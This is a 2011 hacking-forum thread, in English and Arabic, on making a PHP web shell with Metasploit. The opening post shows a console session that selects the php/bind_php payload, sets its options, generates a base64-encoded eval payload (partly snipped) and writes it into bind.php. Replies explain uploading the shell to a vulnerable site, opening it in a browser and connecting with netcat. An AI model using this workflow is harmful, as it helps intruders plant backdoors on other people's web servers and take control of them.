:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   MetaSploit (http://www.vbspiders.com/vb/forumdisplay.php?f=196)
-   -   Metasploit PHP Shell (http://www.vbspiders.com/vb/showthread.php?t=43056)

data$hack 02-12-2011 09:15 PM

Metasploit PHP Shell
 

HI EVERYONE
LIKE THE TITLE SAD

كود:





                                  _

                                | |      o

 _  _  _    _ _|_  __,  ,    _  | |  __    _|_

/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |

  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/

                          /|

                          \|





      =[ metasploit v3.5.2-beta [core:3.5 api:1.0]

+ -- --=[ 644 exploits - 328 auxiliary

+ -- --=[ 216 payloads - 27 encoders - 8 nops

      =[ svn r11722 updated 4 days ago (2011.02.08)



msf > search php
[*] Searching loaded modules for pattern 'php'...

<--BIG SNIP-->

NOP Generators

==============



  Name        Disclosure Date  Rank    Description

  ----        ---------------  ----    -----------

  php/generic                  normal  PHP Nop Generator





Payloads

========



  Name                        Disclosure Date  Rank    Description

  ----                        ---------------  ----    -----------

  php/bind_perl                                normal  PHP Command Shell, Bind TCP (via perl)

  php/bind_php                                  normal  PHP Command Shell, Bind TCP (via php)

  php/download_exec                            normal  PHP Executable Download and Execute

  php/exec                                      normal  PHP Execute Command

  php/meterpreter/bind_tcp                      normal  PHP Meterpreter, Bind TCP Stager

  php/meterpreter/reverse_tcp                  normal  PHP Meterpreter, PHP Reverse TCP stager

  php/meterpreter_reverse_tcp                  normal  PHP Meterpreter, Reverse TCP Inline

  php/reverse_perl                              normal  PHP Command, Double reverse TCP connection (via perl)

  php/reverse_php                              normal  PHP Command Shell, Reverse TCP (via php)

  php/shell_findsock                            normal  PHP Command Shell, Find Sock



msf > use php/bind_php

msf payload(bind_php) > show options



Module options (payload/php/bind_php):



  Name  Current Setting  Required  Description

  ----  ---------------  --------  -----------

  LPORT  4444            yes      The listen port

  RHOST                  no        The target address



msf payload(bind_php) > set RHOST 192.168.1.5

RHOST => 192.168.1.5

msf payload(bind_php) > set LPORT 4321

LPORT => 4321

msf payload(bind_php) > generate -h

Usage: generate [options]



Generates a payload.



OPTIONS:



    -E        Force encoding.

    -b <opt>  The list of characters to avoid: '\x00\xff'

    -e <opt>  The name of the encoder module to use.

    -f <opt>  The output file name (otherwise stdout)

    -h        Help banner.

    -i <opt>  the number of encoding iterations.

    -k        Keep the template executable functional

    -o <opt>  A comma separated list of options in VAR=VAL format.

    -p <opt>  The Platform for output.

    -s <opt>  NOP sled length.

    -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war

    -x <opt>  The executable template to use



msf payload(bind_php) > generate -t raw -e php/base64

eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->

msf payload(bind_php) > exit



root@pentest101-desktop:/var/www# echo '<?php eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK)); ?>' > bind.php



#pentest101.blogspot.com

كود:

http://pastebin.com/5G1sH1x9

ReD-HaT 02-12-2011 09:23 PM

مشكوووووووووووووور

anti-trust 02-12-2011 09:24 PM

heheheheheh

Rock 'N Roll Baby

Don't Bother Me Right Now Coz am in Love




hitman-zone 02-12-2011 09:29 PM

nice reverse bro watch your pwn machine and make more skills boxpwning

data$hack 02-12-2011 09:38 PM

trust
you cheating on me
?

Don't Bother Me Right Now Coz am in Love

hitman-zone 02-12-2011 09:42 PM

hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh

data$hack 02-12-2011 09:45 PM

by the way thx guys
HaVe Fun

Dr.NaNo 02-12-2011 09:53 PM

مشكور اخي داتا هااك لكن امممم هل تقصد بهذه الطريقه [ اصنع شل بلغة php ] طبعا الشل يكون من مشروع الميتاسبولت.. طيب هل الشل لما احفظه بإسم .bind.php هل أرفعه الى اي موقع مصاب بثغرة مثلا او ارفعه الى اي موقع واستعرضه من خلال المتصفح؟؟؟ ويظهر معاي هذا الشل ان شاء الله يكون هيك قصدك :d . واسف على السوال.



تحياتي لك. ياغالي.

data$hack 02-12-2011 09:59 PM

نعم اخي ترفع الشل و تستعرضه من المتصفح
ثم تتوجه الى الnc
nc ip port
ip : server ip
port : listening port

c--1 02-12-2011 10:13 PM

لمم افهم ولو كلمة وحدة في الموضوع

hitman-zone 02-12-2011 10:51 PM

nc -l -v ip -p (port)
ex: nc -l -v 192.168.56.101 -p 4444

dr.deep 02-13-2011 05:51 AM

مشـ،،،كــ،،ـور ومــا تقــصر

Cyber Code 02-13-2011 11:07 AM

thanks data$hack keep it up
اقتباس:

<? eval(base64_decode(C9QkJfQoJCQlAc29ja2V0X2Nsb3NlKC RzKTsKCQl9Cg));?>
اقتباس:

مشكور اخي داتا هااك لكن امممم هل تقصد بهذه الطريقه [ اصنع شل بلغة php ] طبعا الشل يكون من مشروع الميتاسبولت.. طيب هل الشل لما احفظه بإسم .bind.php هل أرفعه الى اي موقع مصاب بثغرة مثلا او ارفعه الى اي موقع واستعرضه من خلال المتصفح؟؟؟ ويظهر معاي هذا الشل ان شاء الله يكون هيك قصدك :d . واسف على السوال.



تحياتي لك. ياغالي.

هذي وحده من طرق الأتصال في السرفر (عكسي أو مباشر) عبر النت كت في استخدام شل الميتا سبلويت .

والأستغلال مثل ماوضحو لك الشباب فوق , المهم عند كتابة الكود ضعه بين الأشارتين
كود:

<?
code
?>

في أمان الله

£Y@$s!n 02-25-2011 09:08 AM

بارك الله فيك


الساعة الآن 12:48 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0